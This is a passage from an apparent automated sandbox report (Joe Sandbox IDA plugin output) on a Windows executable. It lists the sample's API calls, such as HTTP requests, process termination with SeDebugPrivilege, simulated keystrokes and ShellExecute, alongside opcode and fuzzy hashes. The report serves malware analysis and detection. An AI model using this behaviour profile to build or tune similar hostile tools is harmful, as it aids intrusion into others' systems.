                                                                                                                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00AE4CEE
                                                                                                                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00AE4D1E
                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00AE4D65
                                                                                                                                                          • Part of subcall function 00AE56A9: GetLastError.KERNEL32(?,?,00AE4A2B,00000000,00000000,00000001), ref: 00AE56BE
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1241431887-3916222277
                                                                                                                                                        • Opcode ID: f234461c2a251e1592ab763404ce3237f1e34c3209a48dd4a88785333f2d4c9f
                                                                                                                                                        • Instruction ID: 1405ed1dff5180b80a2dc9e57148d9c91d25687f3872d9ad38ad07ce12667bbd
                                                                                                                                                        • Opcode Fuzzy Hash: f234461c2a251e1592ab763404ce3237f1e34c3209a48dd4a88785333f2d4c9f
                                                                                                                                                        • Instruction Fuzzy Hash: CA418DB1501658BFEB129F62CD89FFA77ACEF48314F10811AFA019B191DB74DD449BA0
                                                                                                                                                        APIs
                                                                                                                                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00B2DBF0), ref: 00AEBBA1
                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00B2DBF0), ref: 00AEBBD5
                                                                                                                                                        • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00AEBD33
                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 00AEBD5D
                                                                                                                                                        • StringFromGUID2.COMBASE(?,?,00000028), ref: 00AEBEAD
                                                                                                                                                        • ProgIDFromCLSID.COMBASE(?,?), ref: 00AEBEF7
                                                                                                                                                        • CoTaskMemFree.COMBASE(?), ref: 00AEBF14
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Free$FromString$FileLibraryModuleNamePathProgQueryTaskType
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 793797124-0
                                                                                                                                                        • Opcode ID: d644a19b9ea24b57e0d9ed5f02ac96e26e3f09c73fdb8bf16afc29846c543d65
                                                                                                                                                        • Instruction ID: 72c1552410be91b6bd01b8be8b35e23d1a3f7cb8d99ea3f59e03a2008fb18169
                                                                                                                                                        • Opcode Fuzzy Hash: d644a19b9ea24b57e0d9ed5f02ac96e26e3f09c73fdb8bf16afc29846c543d65
                                                                                                                                                        • Instruction Fuzzy Hash: 96F10A75A10109EFCF04DFA5C988EAEB7B9FF89314F108499F905AB250DB31AE41CB60
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00A949CA: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00A94954,00000000), ref: 00A94A23
                                                                                                                                                        • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00AAB85B), ref: 00AAB926
                                                                                                                                                        • KillTimer.USER32(00000000,?,00000000,?,?,?,?,00AAB85B,00000000,?,?,00AAAF1E,?,?), ref: 00AAB9BD
                                                                                                                                                        • DestroyAcceleratorTable.USER32(00000000), ref: 00B0E775
                                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00B0E7EB
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Destroy$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2402799130-0
                                                                                                                                                        • Opcode ID: f14faf17e85f8adc116ef6a43db8d98730972bafb36b21e4af73d8b2825f806f
                                                                                                                                                        • Instruction ID: 975c35db9def75b381faea0bdf4cd17fcc6458f55315c7954b316980201fad28
                                                                                                                                                        • Opcode Fuzzy Hash: f14faf17e85f8adc116ef6a43db8d98730972bafb36b21e4af73d8b2825f806f
                                                                                                                                                        • Instruction Fuzzy Hash: A8619A31110701CFDB369F29D988B26BBF5FB4A312F108999E196876B1CB75EC80CB60
                                                                                                                                                        APIs
                                                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00AFB204
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InvalidateRect
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 634782764-0
                                                                                                                                                        • Opcode ID: 3b07169af6f3f8f65eafbdf8799370e55a1a6fcbcbb7b4fdcc771d6334a00de6
                                                                                                                                                        • Instruction ID: 7f75955480972c64c41f7c6049aa96c499d0e740e4b2df62bc3fb8ae81b4a7c4
                                                                                                                                                        • Opcode Fuzzy Hash: 3b07169af6f3f8f65eafbdf8799370e55a1a6fcbcbb7b4fdcc771d6334a00de6
                                                                                                                                                        • Instruction Fuzzy Hash: FE51A13066021CBEEB309FA8CC85BBE7B75AB06350F204615FB15DB5E1C771E9508B64
                                                                                                                                                        APIs
                                                                                                                                                        • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00B0E9EA
                                                                                                                                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00B0EA0B
                                                                                                                                                        • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00B0EA20
                                                                                                                                                        • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00B0EA3D
                                                                                                                                                        • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00B0EA64
                                                                                                                                                        • DestroyCursor.USER32(00000000), ref: 00B0EA6F
                                                                                                                                                        • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00B0EA8C
                                                                                                                                                        • DestroyCursor.USER32(00000000), ref: 00B0EA97
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CursorDestroyExtractIconImageLoadMessageSend
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3992029641-0
                                                                                                                                                        • Opcode ID: 36ccc63ce4f5a3ece75752a100d5e25cdd582f8dc7d55fe85ff59946a45724da
                                                                                                                                                        • Instruction ID: 57aceb0c7e07f0662213e95c792272152540948dd5cbb3202d849510ec5e2d1e
                                                                                                                                                        • Opcode Fuzzy Hash: 36ccc63ce4f5a3ece75752a100d5e25cdd582f8dc7d55fe85ff59946a45724da
                                                                                                                                                        • Instruction Fuzzy Hash: 1B515770A00209AFDB24CF69CC81FAA7BF5EB59750F104A59F956972D0DBB0ED80DB60
                                                                                                                                                        APIs
                                                                                                                                                        • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,00B0E9A0,00000004,00000000,00000000), ref: 00AAF737
                                                                                                                                                        • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,00B0E9A0,00000004,00000000,00000000), ref: 00AAF77E
                                                                                                                                                        • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,00B0E9A0,00000004,00000000,00000000), ref: 00B0EB55
                                                                                                                                                        • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,00B0E9A0,00000004,00000000,00000000), ref: 00B0EBC1
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ShowWindow
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1268545403-0
                                                                                                                                                        • Opcode ID: 79cbbdc819f8bea4add073070430d417a922ec21ef3ce46d834431b2150aa642
                                                                                                                                                        • Instruction ID: df0dcffc298678caf1c80a9b92af6f2227e4891618a140eab96642f0acfbb366
                                                                                                                                                        • Opcode Fuzzy Hash: 79cbbdc819f8bea4add073070430d417a922ec21ef3ce46d834431b2150aa642
                                                                                                                                                        • Instruction Fuzzy Hash: E141D9312046809EDB3D47B88DC8B7A7BE5AB47301F684CADE09B435E1CB71E880D721
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00ACE138: GetWindowThreadProcessId.USER32(?,00000000), ref: 00ACE158
                                                                                                                                                          • Part of subcall function 00ACE138: GetCurrentThreadId.KERNEL32 ref: 00ACE15F
                                                                                                                                                          • Part of subcall function 00ACE138: AttachThreadInput.USER32(00000000,?,00ACCD34,?,00000001), ref: 00ACE166
                                                                                                                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 00ACCE06
                                                                                                                                                        • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00ACCE23
                                                                                                                                                        • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00ACCE26
                                                                                                                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 00ACCE2F
                                                                                                                                                        • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00ACCE4D
                                                                                                                                                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00ACCE50
                                                                                                                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 00ACCE59
                                                                                                                                                        • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00ACCE70
                                                                                                                                                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00ACCE73
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2014098862-0
                                                                                                                                                        • Opcode ID: d8b57305c51f908054750416766cede815fa966fafa436d1355b2b007efb7beb
                                                                                                                                                        • Instruction ID: 6146d723a564cdd1cb7c7a010ecaa370ff78a1db42ab2aed9e4d5a956a17950c
                                                                                                                                                        • Opcode Fuzzy Hash: d8b57305c51f908054750416766cede815fa966fafa436d1355b2b007efb7beb
                                                                                                                                                        • Instruction Fuzzy Hash: AA1104B1550618BEF7106F648C8EFAA3B2DDB18754F910419F3406B0E0CDF2AC109AA4
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00ACA857: CLSIDFromProgID.COMBASE ref: 00ACA874
                                                                                                                                                          • Part of subcall function 00ACA857: ProgIDFromCLSID.COMBASE(?,00000000), ref: 00ACA88F
                                                                                                                                                          • Part of subcall function 00ACA857: lstrcmpiW.KERNEL32(?,00000000), ref: 00ACA89D
                                                                                                                                                          • Part of subcall function 00ACA857: CoTaskMemFree.COMBASE(00000000), ref: 00ACA8AD
                                                                                                                                                        • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 00AEC6AD
                                                                                                                                                        • _memset.LIBCMT ref: 00AEC6BA
                                                                                                                                                        • _memset.LIBCMT ref: 00AEC7D8
                                                                                                                                                        • CoCreateInstanceEx.COMBASE(?,00000000,00000015,?,00000001,00000001), ref: 00AEC804
                                                                                                                                                        • CoTaskMemFree.COMBASE(?), ref: 00AEC80F
                                                                                                                                                        Strings
                                                                                                                                                        • NULL Pointer assignment, xrefs: 00AEC85D
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                                                                                                        • String ID: NULL Pointer assignment
                                                                                                                                                        • API String ID: 1300414916-2785691316
                                                                                                                                                        • Opcode ID: 3fe4284342e7f3faabb1a955b26e0c099aad8c24c41a0c9b97105c2a5a5bfbd1
                                                                                                                                                        • Instruction ID: a4a38d484dd3c68db47421707660916ce6c0f1bc3341176d864a9a2bad6aa724
                                                                                                                                                        • Opcode Fuzzy Hash: 3fe4284342e7f3faabb1a955b26e0c099aad8c24c41a0c9b97105c2a5a5bfbd1
                                                                                                                                                        • Instruction Fuzzy Hash: 6E913971D00218ABDF10DFA5DD81EDEBBB9EF08720F20416AF519A7291DB705A45CFA0
                                                                                                                                                        APIs
                                                                                                                                                        • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00AF9926
                                                                                                                                                        • SendMessageW.USER32(?,00001036,00000000,?), ref: 00AF993A
                                                                                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00AF9954
                                                                                                                                                        • _wcscat.LIBCMT ref: 00AF99AF
                                                                                                                                                        • SendMessageW.USER32(?,00001057,00000000,?), ref: 00AF99C6
                                                                                                                                                        • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00AF99F4
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessageSend$Window_wcscat
                                                                                                                                                        • String ID: SysListView32
                                                                                                                                                        • API String ID: 307300125-78025650
                                                                                                                                                        • Opcode ID: 998e27df25b0151c20e9461d28969ff0c13d610737ae6f512c49347a28894de4
                                                                                                                                                        • Instruction ID: a834b7e2d046a5318cc4b42bf36702deff419b172d37067c20aacf2e6c97db37
                                                                                                                                                        • Opcode Fuzzy Hash: 998e27df25b0151c20e9461d28969ff0c13d610737ae6f512c49347a28894de4
                                                                                                                                                        • Instruction Fuzzy Hash: 0841A171900308ABEF219FA4C885FEF77E8EF09350F10446AF689A7291D7719D848B60
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00AD6F5B: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00AD6F7D
                                                                                                                                                          • Part of subcall function 00AD6F5B: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00AD6F8D
                                                                                                                                                          • Part of subcall function 00AD6F5B: CloseHandle.KERNEL32(00000000,?,00000000), ref: 00AD7022
                                                                                                                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00AF168B
                                                                                                                                                        • GetLastError.KERNEL32 ref: 00AF169E
                                                                                                                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00AF16CA
                                                                                                                                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 00AF1746
                                                                                                                                                        • GetLastError.KERNEL32(00000000), ref: 00AF1751
                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00AF1786
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                                                        • String ID: SeDebugPrivilege
                                                                                                                                                        • API String ID: 2533919879-2896544425
                                                                                                                                                        • Opcode ID: c3231cbd3104c155aab1f045ca3e427a49e1c37645979a1fe76905d98f985d80
                                                                                                                                                        • Instruction ID: 3a351b84af91f0353693e7153c2533541ba135316923ef816ce6f625d58f76c6
                                                                                                                                                        • Opcode Fuzzy Hash: c3231cbd3104c155aab1f045ca3e427a49e1c37645979a1fe76905d98f985d80
                                                                                                                                                        • Instruction Fuzzy Hash: A0418B75700206AFDB04EF94CAA6FBDB7E5AF54714F048049FA0A9F292DB799804CF51
                                                                                                                                                        APIs
                                                                                                                                                        • LoadIconW.USER32(00000000,00007F03), ref: 00AD62D6
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: IconLoad
                                                                                                                                                        • String ID: blank$info$question$stop$warning
                                                                                                                                                        • API String ID: 2457776203-404129466
                                                                                                                                                        • Opcode ID: 10a0fd68dd753fa19976bd80cc453a2c2b7fcfc1770ca04d1f707fc4aaf32308
                                                                                                                                                        • Instruction ID: 328f334f0b1f2384aeb29d9cb4a56f45096ccb1924b5852a1c52e824afaf9d9a
                                                                                                                                                        • Opcode Fuzzy Hash: 10a0fd68dd753fa19976bd80cc453a2c2b7fcfc1770ca04d1f707fc4aaf32308
                                                                                                                                                        • Instruction Fuzzy Hash: BF112C31A0C343BAE7055B55DC92DEA73EC9F1A724B20002BF502A63C3FBF4AB414564
                                                                                                                                                        APIs
                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000100,00000000), ref: 00AD7595
                                                                                                                                                        • LoadStringW.USER32(00000000), ref: 00AD759C
                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00AD75B2
                                                                                                                                                        • LoadStringW.USER32(00000000), ref: 00AD75B9
                                                                                                                                                        • _wprintf.LIBCMT ref: 00AD75DF
                                                                                                                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00AD75FD
                                                                                                                                                        Strings
                                                                                                                                                        • %s (%d) : ==> %s: %s %s, xrefs: 00AD75DA
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: HandleLoadModuleString$Message_wprintf
                                                                                                                                                        • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                                                        • API String ID: 3648134473-3128320259
                                                                                                                                                        • Opcode ID: 3d116df02c6537f488563a2e3689af6e12dab70ab9f0a8b13d5dc6644a866eda
                                                                                                                                                        • Instruction ID: 9f03e54900a94d92f1814d6e68b1f6d4569e508db931165e686a3cd74456045a
                                                                                                                                                        • Opcode Fuzzy Hash: 3d116df02c6537f488563a2e3689af6e12dab70ab9f0a8b13d5dc6644a866eda
                                                                                                                                                        • Instruction Fuzzy Hash: 7A0136F6500208BFE711A794ED89EEB776CDB04301F4044A6B746E3041EE789E848B75
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00A9CAEE: _memmove.LIBCMT ref: 00A9CB2F
                                                                                                                                                          • Part of subcall function 00AF3AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00AF2AA6,?,?), ref: 00AF3B0E
                                                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00AF2AE7
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: BuffCharConnectRegistryUpper_memmove
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3479070676-0
                                                                                                                                                        • Opcode ID: 511635dc24a2d0d3c4524c7ea5f718d7b33f104966549ab420347d6ee81a338d
                                                                                                                                                        • Instruction ID: 8e307017b5c0169325279f3ea7063b7058538ed28f39ecf4a8fc635d859abb40
                                                                                                                                                        • Opcode Fuzzy Hash: 511635dc24a2d0d3c4524c7ea5f718d7b33f104966549ab420347d6ee81a338d
                                                                                                                                                        • Instruction Fuzzy Hash: BD917831604205AFCB01EF94C995B6EB7E5FF88314F14881DFA969B2A1DB34E946CF42
                                                                                                                                                        APIs
                                                                                                                                                        • select.WS2_32 ref: 00AE9B38
                                                                                                                                                        • WSAGetLastError.WS2_32(00000000), ref: 00AE9B45
                                                                                                                                                        • __WSAFDIsSet.WS2_32(00000000,?), ref: 00AE9B6F
                                                                                                                                                        • WSAGetLastError.WS2_32(00000000), ref: 00AE9B9F
                                                                                                                                                        • htons.WS2_32(?), ref: 00AE9C51
                                                                                                                                                        • inet_ntoa.WS2_32(?), ref: 00AE9C0C
                                                                                                                                                          • Part of subcall function 00ACE0F5: _strlen.LIBCMT ref: 00ACE0FF
                                                                                                                                                          • Part of subcall function 00ACE0F5: _memmove.LIBCMT ref: 00ACE121
                                                                                                                                                        • _strlen.LIBCMT ref: 00AE9CA7
                                                                                                                                                        • _memmove.LIBCMT ref: 00AE9D10
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorLast_memmove_strlen$htonsinet_ntoaselect
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3637404534-0
                                                                                                                                                        • Opcode ID: c1dfc2f7458858eb5f464fbae63ff2605c35b5fc9e6d2027010b5408a6fc2ae0
                                                                                                                                                        • Instruction ID: b4fa80dfec5f76868598a65483cac54477ecf3a6275f9f7eb1ab3521c8d6c30a
                                                                                                                                                        • Opcode Fuzzy Hash: c1dfc2f7458858eb5f464fbae63ff2605c35b5fc9e6d2027010b5408a6fc2ae0
                                                                                                                                                        • Instruction Fuzzy Hash: B4819C71604340AFDB10EF25CD85EABB7E9EB89724F104629F5559B291DB30D904CBA2
                                                                                                                                                        APIs
                                                                                                                                                        • __mtinitlocknum.LIBCMT ref: 00ABB744
                                                                                                                                                          • Part of subcall function 00AB8A0C: __FF_MSGBANNER.LIBCMT ref: 00AB8A21
                                                                                                                                                          • Part of subcall function 00AB8A0C: __NMSG_WRITE.LIBCMT ref: 00AB8A28
                                                                                                                                                          • Part of subcall function 00AB8A0C: __malloc_crt.LIBCMT ref: 00AB8A48
                                                                                                                                                        • __lock.LIBCMT ref: 00ABB757
                                                                                                                                                        • __lock.LIBCMT ref: 00ABB7A3
                                                                                                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,00B46948,00000018,00AC6C2B,?,00000000,00000109), ref: 00ABB7BF
                                                                                                                                                        • RtlEnterCriticalSection.NTDLL(8000000C), ref: 00ABB7DC
                                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(8000000C), ref: 00ABB7EC
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1422805418-0
                                                                                                                                                        • Opcode ID: d3d3fb8380b9dd835b6a2190f036388a801944557347159029afc0a3e191ff0a
                                                                                                                                                        • Instruction ID: a889a091190f0adf331888e4233a28f30e17370c6a723ade7a01763c0c99e4a6
                                                                                                                                                        • Opcode Fuzzy Hash: d3d3fb8380b9dd835b6a2190f036388a801944557347159029afc0a3e191ff0a
                                                                                                                                                        • Instruction Fuzzy Hash: 3F412471D213159BEB10AFACD9443ECB7ACBF41325F108219E425AB2D3CBB59940CBA0
                                                                                                                                                        APIs
                                                                                                                                                        • InterlockedExchange.KERNEL32(?,000001F5), ref: 00ADA1CE
                                                                                                                                                          • Part of subcall function 00AB010A: std::exception::exception.LIBCMT ref: 00AB013E
                                                                                                                                                          • Part of subcall function 00AB010A: __CxxThrowException@8.LIBCMT ref: 00AB0153
                                                                                                                                                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00ADA205
                                                                                                                                                        • RtlEnterCriticalSection.NTDLL(?), ref: 00ADA221
                                                                                                                                                        • _memmove.LIBCMT ref: 00ADA26F
                                                                                                                                                        • _memmove.LIBCMT ref: 00ADA28C
                                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(?), ref: 00ADA29B
                                                                                                                                                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00ADA2B0
                                                                                                                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 00ADA2CF
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 256516436-0
                                                                                                                                                        • Opcode ID: f09156fe21eb4e5e203fcdc5a4d75571ff140a638df78a1a91034ece859e79f7
                                                                                                                                                        • Instruction ID: 4cbb1d92f47726e9ea864de675f12f48f7c8e802c2c1bd6852bbc98d0fe7036a
                                                                                                                                                        • Opcode Fuzzy Hash: f09156fe21eb4e5e203fcdc5a4d75571ff140a638df78a1a91034ece859e79f7
                                                                                                                                                        • Instruction Fuzzy Hash: 4B317031A00105ABCB00EFA9DD85EEEBBB8EF45310B5480A5F905AB256DB74DE14CBA1
                                                                                                                                                        APIs
                                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00AF8CF3
                                                                                                                                                        • GetDC.USER32(00000000), ref: 00AF8CFB
                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00AF8D06
                                                                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00AF8D12
                                                                                                                                                        • CreateFontW.GDI32(?,00000000,00000000,00000000,?,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00AF8D4E
                                                                                                                                                        • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00AF8D5F
                                                                                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00AF8D99
                                                                                                                                                        • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00AF8DB9
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3864802216-0
                                                                                                                                                        • Opcode ID: 7186cd303ef2f8756aa83f7f16c9e1e4ebaab15bc2a5ed0b4b38c93cf91738bf
                                                                                                                                                        • Instruction ID: e3b1133dbd3f807fe67193caeca3fffec1096b70861e54c0625f0b30f17257ba
                                                                                                                                                        • Opcode Fuzzy Hash: 7186cd303ef2f8756aa83f7f16c9e1e4ebaab15bc2a5ed0b4b38c93cf91738bf
                                                                                                                                                        • Instruction Fuzzy Hash: 01314C72201614BFEB118F51CC8AFEA3BA9EF49755F448065FE08DB191DBB99841CB70
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 161f31cb96887c469af790153b399788577f5060dd26984cf45d789fba5a8b26
                                                                                                                                                        • Instruction ID: 38a8f1e90f3ccf52177e5a23a7dfdd86b23a4f672735812fe49906ea3243685d
                                                                                                                                                        • Opcode Fuzzy Hash: 161f31cb96887c469af790153b399788577f5060dd26984cf45d789fba5a8b26
                                                                                                                                                        • Instruction Fuzzy Hash: 70714A7191010AEFCB15CF98CC89ABEBB74FF8A314F148159F916AB292C7359A51CB60
                                                                                                                                                        APIs
                                                                                                                                                        • _memset.LIBCMT ref: 00AF214B
                                                                                                                                                        • _memset.LIBCMT ref: 00AF2214
                                                                                                                                                        • ShellExecuteExW.SHELL32(?), ref: 00AF2259
                                                                                                                                                          • Part of subcall function 00A984A6: __swprintf.LIBCMT ref: 00A984E5
